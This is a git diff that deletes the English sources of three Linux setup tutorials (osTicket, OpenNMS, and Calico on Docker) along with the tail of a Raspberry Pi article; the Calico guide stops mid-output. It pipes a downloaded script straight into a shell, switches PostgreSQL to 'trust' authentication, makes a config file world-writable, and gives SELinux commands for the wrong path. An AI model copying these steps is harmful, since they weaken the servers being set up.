-via: https://opensource.com/education/15/12/5-great-raspberry-pi-projects-classroom
-
-作者:[Ben Nuttall][a]
-译者:[译者ID](https://github.com/译者ID)
-校对:[校对者ID](https://github.com/校对者ID)
-
-本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
-
-[a]:https://opensource.com/users/bennuttall
-[1]:https://creativecommons.org/licenses/by-sa/4.0/
-[2]:https://opensource.com/life/15/5/getting-started-minecraft-pi
-[3]:http://lowvoltagelabs.com/
-[4]:http://lowvoltagelabs.com/products/pi-traffic/
-[5]:http://4tronix.co.uk/store/index.php?rt=product/product&product_id=390
-[6]:https://ryanteck.uk/hats/1-traffichat-0635648607122.html
-[7]:http://pythonhosted.org/gpiozero/recipes/
-[8]:http://camjam.me/?page_id=236
-[9]:https://opensource.com/life/15/10/exploring-raspberry-pi-sense-hat
-[10]:https://www.raspberrypi.org/learning/infrared-bird-box/
-[11]:https://www.piborg.org/4borg
-[12]:https://www.piborg.org/diddyborg
-[13]:https://www.piborg.org/doodleborg
-[14]:http://camjam.me/?page_id=1035#worksheets
diff --git a/sources/tech/20150817 How to Install OsTicket Ticketing System in Fedora 22 or Centos 7.md b/sources/tech/20150817 How to Install OsTicket Ticketing System in Fedora 22 or Centos 7.md
deleted file mode 100644
index 7a56750804..0000000000
--- a/sources/tech/20150817 How to Install OsTicket Ticketing System in Fedora 22 or Centos 7.md
+++ /dev/null
@@ -1,180 +0,0 @@
-translated by iov-wang
-How to Install OsTicket Ticketing System in Fedora 22 / Centos 7
-================================================================================
-In this article, we'll learn how to setup help desk ticketing system with osTicket in our machine or server running Fedora 22 or CentOS 7 as operating system. osTicket is a free and open source popular customer support ticketing system developed and maintained by [Enhancesoft][1] and its contributors. osTicket is the best solution for help and support ticketing system and management for better communication and support assistance with clients and customers. It has the ability to easily integrate with inquiries created via email, phone and web based forms into a beautiful multi-user web interface. osTicket makes us easy to manage, organize and log all our support requests and responses in one single place. It is a simple, lightweight, reliable, open source, web-based and easy to setup and use help desk ticketing system.
-
-Here are some easy steps on how we can setup Help Desk ticketing system with osTicket in Fedora 22 or CentOS 7 operating system.
-
-### 1. Installing LAMP stack ###
-
-First of all, we'll need to install LAMP Stack to make osTicket working. LAMP stack is the combination of Apache web server, MySQL or MariaDB database system and PHP. To install a complete suit of LAMP stack that we need for the installation of osTicket, we'll need to run the following commands in a shell or a terminal.
-
-**On Fedora 22**
-
-LAMP stack is available on the official repository of Fedora 22. As the default package manager of Fedora 22 is the latest DNF package manager, we'll need to run the following command.
-
- $ sudo dnf install httpd mariadb mariadb-server php php-mysql php-fpm php-cli php-xml php-common php-gd php-imap php-mbstring wget
-
-**On CentOS 7**
-
-As there is LAMP stack available on the official repository of CentOS 7, we'll gonna install it using yum package manager.
-
- $ sudo yum install httpd mariadb mariadb-server php php-mysql php-fpm php-cli php-xml php-common php-gd php-imap php-mbstring wget
-
-### 2. Starting Apache Web Server and MariaDB ###
-
-Next, we'll gonna start MariaDB server and Apache Web Server to get started.
-
- $ sudo systemctl start mariadb httpd
-
-Then, we'll gonna enable them to start on every boot of the system.
-
- $ sudo systemctl enable mariadb httpd
-
- Created symlink from /etc/systemd/system/multi-user.target.wants/mariadb.service to /usr/lib/systemd/system/mariadb.service.
- Created symlink from /etc/systemd/system/multi-user.target.wants/httpd.service to /usr/lib/systemd/system/httpd.service.
-
-### 3. Downloading osTicket package ###
-
-Next, we'll gonna download the latest release of osTicket ie version 1.9.9 . We can download it from the official download page [http://osticket.com/download][2] or from the official github repository. [https://github.com/osTicket/osTicket-1.8/releases][3] . Here, in this tutorial we'll download the tarball of the latest release of osTicket from the github release page using wget command.
-
- $ cd /tmp/
- $ wget https://github.com/osTicket/osTicket-1.8/releases/download/v1.9.9/osTicket-v1.9.9-1-gbe2f138.zip
-
- --2015-07-16 09:14:23-- https://github.com/osTicket/osTicket-1.8/releases/download/v1.9.9/osTicket-v1.9.9-1-gbe2f138.zip
- Resolving github.com (github.com)... 192.30.252.131
- ...
- Connecting to s3.amazonaws.com (s3.amazonaws.com)|54.231.244.4|:443... connected.
- HTTP request sent, awaiting response... 200 OK
- Length: 7150871 (6.8M) [application/octet-stream]
- Saving to: ‘osTicket-v1.9.9-1-gbe2f138.zip’
- osTicket-v1.9.9-1-gb 100%[========================>] 6.82M 1.25MB/s in 12s
- 2015-07-16 09:14:37 (604 KB/s) - ‘osTicket-v1.9.9-1-gbe2f138.zip’ saved [7150871/7150871]
-
-### 4. Extracting the osTicket ###
-
-After we have successfully downloaded the osTicket zipped package, we'll now gonna extract the zip. As the default root directory of Apache web server is /var/www/html/ , we'll gonna create a directory called "**support**" where we'll extract the whole directory and files of the compressed zip file. To do so, we'll need to run the following commands in a terminal or a shell.
-
- $ unzip osTicket-v1.9.9-1-gbe2f138.zip
-
-Then, we'll move the whole extracted files to it.
-
- $ sudo mv /tmp/upload /var/www/html/support
-
-### 5. Fixing Ownership and Permission ###
-
-Now, we'll gonna assign the ownership of the directories and files under /var/ww/html/support to apache to enable writable access to the apache process owner. To do so, we'll need to run the following command.
-
- $ sudo chown apache: -R /var/www/html/support
-
-Then, we'll also need to copy a sample configuration file to its default configuration file. To do so, we'll need to run the below command.
-
- $ cd /var/www/html/support/
- $ sudo cp include/ost-sampleconfig.php include/ost-config.php
- $ sudo chmod 0666 include/ost-config.php
-
-If you have SELinux enabled on the system, run the following command.
-
- $ sudo chcon -R -t httpd_sys_content_t /var/www/html/vtigercrm
- $ sudo chcon -R -t httpd_sys_rw_content_t /var/www/html/vtigercrm
-
-### 6. Configuring MariaDB ###
-
-As this is the first time we're going to configure MariaDB, we'll need to create a password for the root user of mariadb so that we can use it to login and create the database for our osTicket installation. To do so, we'll need to run the following command in a terminal or a shell.
-
- $ sudo mysql_secure_installation
-
- ...
- Enter current password for root (enter for none):
- OK, successfully used password, moving on...
-
- Setting the root password ensures that nobody can log into the MariaDB
- root user without the proper authorisation.
-
- Set root password? [Y/n] y
- New password:
- Re-enter new password:
- Password updated successfully!
- Reloading privilege tables..
- Success!
- ...
- All done! If you've completed all of the above steps, your MariaDB
- installation should now be secure.
-
- Thanks for using MariaDB!
-
-Note: Above, we are asked to enter the root password of the mariadb server but as we are setting for the first time and no password has been set yet, we'll simply hit enter while asking the current mariadb root password. Then, we'll need to enter twice the new password we wanna set. Then, we can simply hit enter in every argument in order to set default configurations.
-
-### 7. Creating osTicket Database ###
-
-As osTicket needs a database system to store its data and information, we'll be configuring MariaDB for osTicket. So, we'll need to first login into the mariadb command environment. To do so, we'll need to run the following command.
-
- $ sudo mysql -u root -p
-
-Now, we'll gonna create a new database "**osticket_db**" with user "**osticket_user**" and password "osticket_password" which will be granted access to the database. To do so, we'll need to run the following commands inside the MariaDB command environment.
-
- > CREATE DATABASE osticket_db;
- > CREATE USER 'osticket_user'@'localhost' IDENTIFIED BY 'osticket_password';
- > GRANT ALL PRIVILEGES on osticket_db.* TO 'osticket_user'@'localhost' ;
- > FLUSH PRIVILEGES;
- > EXIT;
-
-**Note**: It is strictly recommended to replace the database name, user and password as your desire for security issue.
-
-### 8. Allowing Firewall ###
-
-If we are running a firewall program, we'll need to configure our firewall to allow port 80 so that the Apache web server's default port will be accessible externally. This will allow us to navigate our web browser to osTicket's web interface with the default http port 80. To do so, we'll need to run the following command.
-
- $ sudo firewall-cmd --zone=public --add-port=80/tcp --permanent
-
-After done, we'll need to reload our firewall service.
-
- $ sudo firewall-cmd --reload
-
-### 9. Web based Installation ###
-
-Finally, is everything is done as described above, we'll now should be able to navigate osTicket's Installer by pointing our web browser to http://domain.com/support or http://ip-address/support . Now, we'll be shown if the dependencies required by osTicket are installed or not. As we've already installed all the necessary packages, we'll be welcomed with **green colored tick** to proceed forward.
-
-![osTicket Requirements Check](http://blog.linoxide.com/wp-content/uploads/2015/07/osticket-requirements-check1.png)
-
-After that, we'll be required to enter the details for our osTicket instance as shown below. We'll need to enter the database name, username, password and hostname and other important account information that we'll require while logging into the admin panel.
-
-![osticket configuration](http://blog.linoxide.com/wp-content/uploads/2015/07/osticket-configuration.png)
-
-After the installation has been completed successfully, we'll be welcomed by a Congratulations screen. There we can see two links, one for our Admin Panel and the other for the support center as the homepage of the osTicket Support Help Desk.
-
-![osticket installation completed](http://blog.linoxide.com/wp-content/uploads/2015/07/osticket-installation-completed.png)
-
-If we click on http://ip-address/support or http://domain.com/support, we'll be redirected to the osTicket support page which is as shown below.
-
-![osticket support homepage](http://blog.linoxide.com/wp-content/uploads/2015/07/osticket-support-homepage.png)
-
-Next, to login into the admin panel, we'll need to navigate our web browser to http://ip-address/support/scp or http://domain.com/support/scp . Then, we'll need to enter the login details we had just created above while configuring the database and other information in the web installer. After successful login, we'll be able to access our dashboard and other admin sections.
-
-![osticket admin panel](http://blog.linoxide.com/wp-content/uploads/2015/07/osticket-admin-panel.png)
-
-### 10. Post Installation ###
-
-After we have finished the web installation of osTicket, we'll now need to secure some of our configuration files. To do so, we'll need to run the following command.
-
- $ sudo rm -rf /var/www/html/support/setup/
- $ sudo chmod 644 /var/www/html/support/include/ost-config.php
-
-### Conclusion ###
-
-osTicket is an awesome help desk ticketing system providing several new features. It supports rich text or HTML emails, ticket filters, agent collision avoidance, auto-responder and many more features. The user interface of osTicket is very beautiful with easy to use control panel. It is a complete set of tools required for a help and support ticketing system. It is the best solution for providing customers a better way to communicate with the support team. It helps a company to make their customers happy with them regarding the support and help desk. If you have any questions, suggestions, feedback please write them in the comment box below so that we can improve or update our contents. Thank you ! Enjoy :-)
-
-------------------------------------------------------------------------------
-
-via: http://linoxide.com/linux-how-to/install-osticket-fedora-22-centos-7/
-
-作者:[Arun Pyasi][a]
-译者:[译者ID](https://github.com/译者ID)
-校对:[校对者ID](https://github.com/校对者ID)
-
-本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创翻译,[Linux中国](https://linux.cn/) 荣誉推出
-
-[a]:http://linoxide.com/author/arunp/
-[1]:http://www.enhancesoft.com/
-[2]:http://osticket.com/download
-[3]:https://github.com/osTicket/osTicket-1.8/releases
diff --git a/sources/tech/20150906 How to Configure OpenNMS on CentOS 7.x.md b/sources/tech/20150906 How to Configure OpenNMS on CentOS 7.x.md
deleted file mode 100644
index aca2b04bba..0000000000
--- a/sources/tech/20150906 How to Configure OpenNMS on CentOS 7.x.md
+++ /dev/null
@@ -1,220 +0,0 @@
-translated by ivo-wang
-How to Configure OpenNMS on CentOS 7.x
-================================================================================
-Systems management and monitoring services are very important that provides information to view important systems management information that allow us to to make decisions based on this information. To make sure the network is running at its best and to minimize the network downtime we need to improve application performance. So, in this article we will make you understand the step by step procedure to setup OpenNMS in your IT infrastructure. OpenNMS is a free open source enterprise level network monitoring and management platform that provides information to allow us to make decisions in regards to future network and capacity planning.
-
-OpenNMS designed to manage tens of thousands of devices from a single server as well as manage unlimited devices using a cluster of servers. It includes a discovery engine to automatically configure and manage network devices without operator intervention. It is written in Java and is published under the GNU General Public License. OpenNMS is known for its scalability with its main functional areas in services monitoring, data collection using SNMP and event management and notifications.
-
-### Installing OpenNMS RPM Repository ###
-
-We will start from the installation of OpenNMS RPM for our CentOs 7.1 operating system as its available for most of the RPM-based distributions through Yum at their official link http://yum.opennms.org/ .
-
-![OpenNMS RPM](http://blog.linoxide.com/wp-content/uploads/2015/08/18.png)
-
-Then open your command line interface of CentOS 7.1 and login with root credentials to run the below command with “wget” to get the required RPM.
-
- [root@open-nms ~]# wget http://yum.opennms.org/repofiles/opennms-repo-stable-rhel7.noarch.rpm
-
-![Download RPM](http://blog.linoxide.com/wp-content/uploads/2015/08/26.png)
-
-Now we need to install this repository so that the OpenNMS package information could be available through yum for installation. Let’s run the command below with same root level credentials to do so.
-
- [root@open-nms ~]# rpm -Uvh opennms-repo-stable-rhel7.noarch.rpm
-
-![Installing RPM](http://blog.linoxide.com/wp-content/uploads/2015/08/36.png)
-
-### Installing Prerequisite Packages for OpenNMS ###
-
-Now before we start installation of OpenNMS, let’s make sure you’ve done the following prerequisites.
-
-**Install JDK 7**
-
-Its recommended that you install the latest stable Java 7 JDK from Oracle for the best performance to integrate JDK in our YUM repository as a fallback. Let’s go to the Oracle Java 7 SE JDK download page, accept the license if you agree, choose the platform and architecture. Once it has finished downloading, execute it from the command-line and then install the resulting JDK rpm.
-
-Else run the below command to install using the Yum from the the available system repositories.
-
- [root@open-nms ~]# yum install java-1.7.0-openjdk-1.7.0.85-2.6.1.2.el7_1
-
-Once you have installed the Java you can confirm its installation using below command and check its installed version.
-
- [root@open-nms ~]# java -version
-
-![Java version](http://blog.linoxide.com/wp-content/uploads/2015/08/46.png)
-
-**Install PostgreSQL**
-
-Now we will install the PostgreSQL that is a must requirement to setup the database for OpenNMS. PostgreSQL is included in all of the major YUM-based distributions. To install, simply run the below command.
-
- [root@open-nms ~]# yum install postgresql postgresql-server
-
-![Installing Postgresql](http://blog.linoxide.com/wp-content/uploads/2015/08/55.png)
-
-### Prepare the Database for OpenNMS ###
-
-Once you have installed PostgreSQL, now you'll need to make sure that PostgreSQL is up and active. Let’s run the below command to first initialize the database and then start its services.
-
- [root@open-nms ~]# /sbin/service postgresql initdb
- [root@open-nms ~]# /sbin/service postgresql start
-
-![start DB](http://blog.linoxide.com/wp-content/uploads/2015/08/64.png)
-
-Now to confirm the status of your PostgreSQL database you can run the below command.
-
- [root@open-nms ~]# service postgresql status
-
-![PostgreSQL status](http://blog.linoxide.com/wp-content/uploads/2015/08/74.png)
-
-To ensure that PostgreSQL will start after a reboot, use the “systemctl”command to enable start on bootup using below command.
-
- [root@open-nms ~]# systemctl enable postgresql
- ln -s '/usr/lib/systemd/system/postgresql.service' '/etc/systemd/system/multi-user.target.wants/postgresql.service'
-
-### Configure PostgreSQL ###
-
-Locate the Postgres “data” directory. Often this is located in /var/lib/pgsql/data directory and Open the postgresql.conf file in text editor and configure the following parameters as shown.
-
- [root@open-nms ~]# vim /var/lib/pgsql/data/postgresql.conf
-
-----------
-
- #------------------------------------------------------------------------------
- # CONNECTIONS AND AUTHENTICATION
- #------------------------------------------------------------------------------
-
- listen_addresses = 'localhost'
- max_connections = 256
-
- #------------------------------------------------------------------------------
- # RESOURCE USAGE (except WAL)
- #------------------------------------------------------------------------------
-
- shared_buffers = 1024MB
-
-**User Access to the Database**
-
-PostgreSQL only allows you to connect if you are logged in to the local account name that matches the PostgreSQL user. Since OpenNMS runs as root, it cannot connect as a "postgres" or "opennms" user by default, so we have to change the configuration to allow user access to the database by opening the below configuration file.
-
- [root@open-nms ~]# vim /var/lib/pgsql/data/pg_hba.conf
-
-Update the configuration file as shown below and change the METHOD settings from "ident" to "trust"
-
-![user access to db](http://blog.linoxide.com/wp-content/uploads/2015/08/84.png)
-
-Write and quit the file to make saved changes and then restart PostgreSQL services.
-
- [root@open-nms ~]# service postgresql restart
-
-### Starting OpenNMS Installation ###
-
-Now we are ready go with installation of OpenNMS as we have almost don with its prerequisites. Using the YUM packaging system will download and install all of the required components and their dependencies, if they are not already installed on your system.
-So let's riun th belwo command to start OpenNMS installation that will pull everything you need to have a working OpenNMS, including the OpenNMS core, web UI, and a set of common plugins.
-
- [root@open-nms ~]# yum -y install opennms
-
-![OpenNMS Installation](http://blog.linoxide.com/wp-content/uploads/2015/08/93.png)
-
-The above command will ends up with successful installation of OpenNMS and its derivative packages.
-
-### Configure JAVA for OpenNMS ###
-
-In order to integrate the default version of Java with OpenNMS we will run the below command.
-
- [root@open-nms ~]# /opt/opennms/bin/runjava -s
-
-![java integration](http://blog.linoxide.com/wp-content/uploads/2015/08/102.png)
-
-### Run the OpenNMS installer ###
-
-Now it's time to start the OpenNMS installer that will create and configure the OpenNMS database, while the same command will be used in case we want to update it to the latest version. To do so, we will run the following command.
-
- [root@open-nms ~]# /opt/opennms/bin/install -dis
-
-The above install command will take many options with following mechanism.
-
--d - to update the database
--i - to insert any default data that belongs in the database
--s - to create or update the stored procedures OpenNMS uses for certain kinds of data access
-
- ==============================================================================
- OpenNMS Installer
- ==============================================================================
-
- Configures PostgreSQL tables, users, and other miscellaneous settings.
-
- DEBUG: Platform is IPv6 ready: true
- - searching for libjicmp.so:
- - trying to load /usr/lib64/libjicmp.so: OK
- - searching for libjicmp6.so:
- - trying to load /usr/lib64/libjicmp6.so: OK
- - searching for libjrrd.so:
- - trying to load /usr/lib64/libjrrd.so: OK
- - using SQL directory... /opt/opennms/etc
- - using create.sql... /opt/opennms/etc/create.sql
- 17:27:51.178 [Main] INFO org.opennms.core.schema.Migrator - PL/PgSQL call handler exists
- 17:27:51.180 [Main] INFO org.opennms.core.schema.Migrator - PL/PgSQL language exists
- - checking if database "opennms" is unicode... ALREADY UNICODE
- - Creating imports directory (/opt/opennms/etc/imports... OK
- - Checking for old import files in /opt/opennms/etc... DONE
- INFO 16/08/15 17:27:liquibase: Reading from databasechangelog
- Installer completed successfully!
-
- ==============================================================================
- OpenNMS Upgrader
- ==============================================================================
-
- OpenNMS is currently stopped
- Found upgrade task SnmpInterfaceRrdMigratorOnline
- Found upgrade task KscReportsMigrator
- Found upgrade task JettyConfigMigratorOffline
- Found upgrade task DataCollectionConfigMigratorOffline
- Processing RequisitionsMigratorOffline: Remove non-ip-snmp-primary and non-ip-interfaces from requisitions: NMS-5630, NMS-5571
- - Running pre-execution phase
- Backing up: /opt/opennms/etc/imports
- - Running post-execution phase
- Removing backup /opt/opennms/etc/datacollection.zip
-
- Finished in 0 seconds
-
- Upgrade completed successfully!
-
-### Firewall configurations to Allow OpenNMS ###
-
-Here we have to allow OpenNMS management interface port 8980 through firewall or router to access the management web interface from the remote systems. So use the following commands to do so.
-
- [root@open-nms etc]# firewall-cmd --permanent --add-port=8980/tcp
- [root@open-nms etc]# firewall-cmd --reload
-
-### Start OpenNMS and Login to Web Interface ###
-
-Let's start OpenNMS service and enable to it start at each bootup by using the below command.
-
- [root@open-nms ~]#systemctl start opennms
- [root@open-nms ~]#systemctl enable opennms
-
-Once the services are up are ready to go with its web management interface. Open your web browser and access it with your server's IP address and 8980 port.
-
-http://servers_ip:8980/
-
-Give the username and password where as the default username and password is admin/admin.
-
-![opennms login](http://blog.linoxide.com/wp-content/uploads/2015/08/opennms-login.png)
-
-After successful authentication with your provided username and password you will be directed towards the the Home page of OpenNMS where you can configure the new monitoring devices/nodes/services etc.
-
-![opennms home](http://blog.linoxide.com/wp-content/uploads/2015/08/opennms-home.png)
-
-### Conclusion ###
-
-Congratulations! we have successfully setup OpenNMS on CentOS 7.1. So, at the end of this tutorial, you are now able to install and configure OpenNMS with its prerequisites that included PostgreSQL and JAVA setup. So let's enjoy with the great network monitoring system with open source roots using OpenNMS that provide a bevy of features at no cost than their high-end competitors, and can scale to monitor large numbers of network nodes.
-
---------------------------------------------------------------------------------
-
-via: http://linoxide.com/monitoring-2/install-configure-opennms-centos-7-x/
-
-作者:[Kashif Siddique][a]
-译者:[译者ID](https://github.com/译者ID)
-校对:[校对者ID](https://github.com/校对者ID)
-
-本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
-
-[a]:http://linoxide.com/author/kashifs/
diff --git a/sources/tech/20151012 Getting Started to Calico Virtual Private Networking on Docker.md b/sources/tech/20151012 Getting Started to Calico Virtual Private Networking on Docker.md
deleted file mode 100644
index 27d60729e9..0000000000
--- a/sources/tech/20151012 Getting Started to Calico Virtual Private Networking on Docker.md
+++ /dev/null
@@ -1,322 +0,0 @@
-Getting Started to Calico Virtual Private Networking on Docker
-================================================================================
-Calico is a free and open source software for virtual networking in data centers. It is a pure Layer 3 approach to highly scalable datacenter for cloud virtual networking. It seamlessly integrates with cloud orchestration system such as openstack, docker clusters in order to enable secure IP communication between virtual machines and containers. It implements a highly productive vRouter in each node that takes advantage of the existing Linux kernel forwarding engine. Calico works in such an awesome technology that it has the ability to peer directly with the data center’s physical fabric whether L2 or L3, without the NAT, tunnels on/off ramps, or overlays. Calico makes full utilization of docker to run its containers in the nodes which makes it multi-platform and very easy to ship, pack and deploy. Calico has the following salient features out of the box.
-
-- It can scale tens of thousands of servers and millions of workloads.
-- Calico is easy to deploy, operate and diagnose.
-- It is open source software licensed under Apache License version 2 and uses open standards.
-- It supports container, virtual machines and bare metal workloads.
-- It supports both IPv4 and IPv6 internet protocols.
-- It is designed internally to support rich, flexible and secure network policy.
-
-In this tutorial, we'll perform a virtual private networking between two nodes running Calico in them with Docker Technology. Here are some easy steps on how we can do that.
-
-### 1. Installing etcd ###
-
-To get started with the calico virtual private networking, we'll need to have a linux machine running etcd. As CoreOS comes preinstalled and preconfigured with etcd, we can use CoreOS but if we want to configure Calico in other linux distributions, then we'll need to setup it in our machine. As we are running Ubuntu 14.04 LTS, we'll need to first install and configure etcd in our machine. To install etcd in our Ubuntu box, we'll need to add the official ppa repository of Calico by running the following command in the machine which we want to run etcd server. Here, we'll be installing etcd in our 1st node.
-
- # apt-add-repository ppa:project-calico/icehouse
-
- The primary source of Ubuntu packages for Project Calico based on OpenStack Icehouse, an open source solution for virtual networking in cloud data centers. Find out more at http://www.projectcalico.org/
- More info: https://launchpad.net/~project-calico/+archive/ubuntu/icehouse
- Press [ENTER] to continue or ctrl-c to cancel adding it
- gpg: keyring `/tmp/tmpi9zcmls1/secring.gpg' created
- gpg: keyring `/tmp/tmpi9zcmls1/pubring.gpg' created
- gpg: requesting key 3D40A6A7 from hkp server keyserver.ubuntu.com
- gpg: /tmp/tmpi9zcmls1/trustdb.gpg: trustdb created
- gpg: key 3D40A6A7: public key "Launchpad PPA for Project Calico" imported
- gpg: Total number processed: 1
- gpg: imported: 1 (RSA: 1)
- OK
-
-Then, we'll need to edit /etc/apt/preferences and make changes to prefer Calico-provided packages for Nova and Neutron.
-
- # nano /etc/apt/preferences
-
-We'll need to add the following lines into it.
-
- Package: *
- Pin: release o=LP-PPA-project-calico-*
- Pin-Priority: 100
-
-![Calico PPA Config](http://blog.linoxide.com/wp-content/uploads/2015/10/calico-ppa-config.png)
-
-Next, we'll also need to add the official BIRD PPA for Ubuntu 14.04 LTS so that bugs fixes are installed before its available on the Ubuntu repo.
-
- # add-apt-repository ppa:cz.nic-labs/bird
-
- The BIRD Internet Routing Daemon PPA (by upstream & .deb maintainer)
- More info: https://launchpad.net/~cz.nic-labs/+archive/ubuntu/bird
- Press [ENTER] to continue or ctrl-c to cancel adding it
- gpg: keyring `/tmp/tmphxqr5hjf/secring.gpg' created
- gpg: keyring `/tmp/tmphxqr5hjf/pubring.gpg' created
- gpg: requesting key F9C59A45 from hkp server keyserver.ubuntu.com
- apt-ggpg: /tmp/tmphxqr5hjf/trustdb.gpg: trustdb created
- gpg: key F9C59A45: public key "Launchpad Datov� schr�nky" imported
- gpg: Total number processed: 1
- gpg: imported: 1 (RSA: 1)
- OK
-
-Now, after the PPA jobs are done, we'll now gonna update the local repository index and then install etcd in our machine.
-
- # apt-get update
-
-To install etcd in our ubuntu machine, we'll gonna run the following apt command.
-
- # apt-get install etcd python-etcd
-
-### 2. Starting Etcd ###
-
-After the installation is complete, we'll now configure the etcd configuration file. Here, we'll edit **/etc/init/etcd.conf** using a text editor and append the line exec **/usr/bin/etcd** and make it look like below configuration.
-
- # nano /etc/init/etcd.conf
- exec /usr/bin/etcd --name="node1" \
- --advertise-client-urls="http://10.130.65.71:2379,http://10.130.65.71:4001" \
- --listen-client-urls="http://0.0.0.0:2379,http://0.0.0.0:4001" \
- --listen-peer-urls "http://0.0.0.0:2380" \
- --initial-advertise-peer-urls "http://10.130.65.71:2380" \
- --initial-cluster-token $(uuidgen) \
- --initial-cluster "node1=http://10.130.65.71:2380" \
- --initial-cluster-state "new"
-
-![Configuring ETCD](http://blog.linoxide.com/wp-content/uploads/2015/10/configuring-etcd.png)
-
-**Note**: In the above configuration, we'll need to replace 10.130.65.71 and node-1 with the private ip address and hostname of your etcd server box. After done with editing, we'll need to save and exit the file.
-
-We can get the private ip address of our etcd server by running the following command.
-
- # ifconfig
-
-![ifconfig](http://blog.linoxide.com/wp-content/uploads/2015/10/ifconfig1.png)
-
-As our etcd configuration is done, we'll now gonna start our etcd service in our Ubuntu node. To start etcd daemon, we'll gonna run the following command.
-
- # service etcd start
-
-After done, we'll have a check if etcd is really running or not. To ensure that, we'll need to run the following command.
-
- # service etcd status
-
-### 3. Installing Docker ###
-
-Next, we'll gonna install Docker in both of our nodes running Ubuntu. To install the latest release of docker, we'll simply need to run the following command.
-
- # curl -sSL https://get.docker.com/ | sh
-
-![Docker Engine Installation](http://blog.linoxide.com/wp-content/uploads/2015/10/docker-engine-installation.png)
-
-After the installation is completed, we'll gonna start the docker daemon in-order to make sure that its running before we move towards Calico.
-
- # service docker restart
-
- docker stop/waiting
- docker start/running, process 3056
-
-### 3. Installing Calico ###
-
-We'll now install calico in our linux machine in-order to run the calico containers. We'll need to install Calico in every node which we're wanting to connect into the Calico network. To install Calico, we'll need to run the following command under root or sudo permission.
-
-#### On 1st Node ####
-
- # wget https://github.com/projectcalico/calico-docker/releases/download/v0.6.0/calicoctl
-
- --2015-09-28 12:08:59-- https://github.com/projectcalico/calico-docker/releases/download/v0.6.0/calicoctl
- Resolving github.com (github.com)... 192.30.252.129
- Connecting to github.com (github.com)|192.30.252.129|:443... connected.
- ...
- Resolving github-cloud.s3.amazonaws.com (github-cloud.s3.amazonaws.com)... 54.231.9.9
- Connecting to github-cloud.s3.amazonaws.com (github-cloud.s3.amazonaws.com)|54.231.9.9|:443... connected.
- HTTP request sent, awaiting response... 200 OK
- Length: 6166661 (5.9M) [application/octet-stream]
- Saving to: 'calicoctl'
- 100%[=========================================>] 6,166,661 1.47MB/s in 6.7s
- 2015-09-28 12:09:08 (898 KB/s) - 'calicoctl' saved [6166661/6166661]
-
- # chmod +x calicoctl
-
-After done with making it executable, we'll gonna make the binary calicoctl available as the command in any directory. To do so, we'll need to run the following command.
-
- # mv calicoctl /usr/bin/
-
-#### On 2nd Node ####
-
- # wget https://github.com/projectcalico/calico-docker/releases/download/v0.6.0/calicoctl
-
- --2015-09-28 12:09:03-- https://github.com/projectcalico/calico-docker/releases/download/v0.6.0/calicoctl
- Resolving github.com (github.com)... 192.30.252.131
- Connecting to github.com (github.com)|192.30.252.131|:443... connected.
- ...
- Resolving github-cloud.s3.amazonaws.com (github-cloud.s3.amazonaws.com)... 54.231.8.113
- Connecting to github-cloud.s3.amazonaws.com (github-cloud.s3.amazonaws.com)|54.231.8.113|:443... connected.
- HTTP request sent, awaiting response... 200 OK
- Length: 6166661 (5.9M) [application/octet-stream]
- Saving to: 'calicoctl'
- 100%[=========================================>] 6,166,661 1.47MB/s in 5.9s
- 2015-09-28 12:09:11 (1022 KB/s) - 'calicoctl' saved [6166661/6166661]
-
- # chmod +x calicoctl
-
-After done with making it executable, we'll gonna make the binary calicoctl available as the command in any directory. To do so, we'll need to run the following command.
-
- # mv calicoctl /usr/bin/
-
-Likewise, we'll need to execute the above commands to install in every other nodes.
-
-### 4. Starting Calico services ###
-
-After we have installed calico on each of our nodes, we'll gonna start our Calico services. To start the calico services, we'll need to run the following commands.
-
-#### On 1st Node ####
-
- # calicoctl node
-
- WARNING: Unable to detect the xt_set module. Load with `modprobe xt_set`
- WARNING: Unable to detect the ipip module. Load with `modprobe ipip`
- No IP provided. Using detected IP: 10.130.61.244
- Pulling Docker image calico/node:v0.6.0
- Calico node is running with id: fa0ca1f26683563fa71d2ccc81d62706e02fac4bbb08f562d45009c720c24a43
-
-#### On 2nd Node ####
-
-Next, we'll gonna export a global variable in order to connect our calico nodes to the same etcd server which is hosted in node1 in our case. To do so, we'll need to run the following command in each of our nodes.
-
- # export ETCD_AUTHORITY=10.130.61.244:2379
-
-Then, we'll gonna run calicoctl container in our every our second node.
-
- # calicoctl node
-
- WARNING: Unable to detect the xt_set module. Load with `modprobe xt_set`
- WARNING: Unable to detect the ipip module. Load with `modprobe ipip`
- No IP provided. Using detected IP: 10.130.61.245
- Pulling Docker image calico/node:v0.6.0
- Calico node is running with id: 70f79c746b28491277e28a8d002db4ab49f76a3e7d42e0aca8287a7178668de4
-
-This command should be executed in every nodes in which we want to start our Calico services. The above command start a container in the respective node. To check if the container is running or not, we'll gonna run the following docker command.
-
- # docker ps
-
-![Docker Running Containers](http://blog.linoxide.com/wp-content/uploads/2015/10/docker-running-containers.png)
-
-If we see the output something similar to the output shown below then we can confirm that Calico containers are up and running.
-
-### 5. Starting Containers ###
-
-Next, we'll need to start few containers in each of our nodes running Calico services. We'll assign a different name to each of the containers running ubuntu. Here, workload-A, workload-B, etc has been assigned as the unique name for each of the containers. To do so, we'll need to run the following command.
-
-#### On 1st Node ####
-
- # docker run --net=none --name workload-A -tid ubuntu
-
- Unable to find image 'ubuntu:latest' locally
- latest: Pulling from library/ubuntu
- ...
- 91e54dfb1179: Already exists
- library/ubuntu:latest: The image you are pulling has been verified. Important: image verification is a tech preview feature and should not be relied on to provide security.
- Digest: sha256:73fbe2308f5f5cb6e343425831b8ab44f10bbd77070ecdfbe4081daa4dbe3ed1
- Status: Downloaded newer image for ubuntu:latest
- a1ba9105955e9f5b32cbdad531cf6ecd9cab0647d5d3d8b33eca0093605b7a18
-
- # docker run --net=none --name workload-B -tid ubuntu
-
- 89dd3d00f72ac681bddee4b31835c395f14eeb1467300f2b1b9fd3e704c28b7d
-
-#### On 2nd Node ####
-
- # docker run --net=none --name workload-C -tid ubuntu
-
- Unable to find image 'ubuntu:latest' locally
- latest: Pulling from library/ubuntu
- ...
- 91e54dfb1179: Already exists
- library/ubuntu:latest: The image you are pulling has been verified. Important: image verification is a tech preview feature and should not be relied on to provide security.
- Digest: sha256:73fbe2308f5f5cb6e343425831b8ab44f10bbd77070ecdfbe4081daa4dbe3ed1
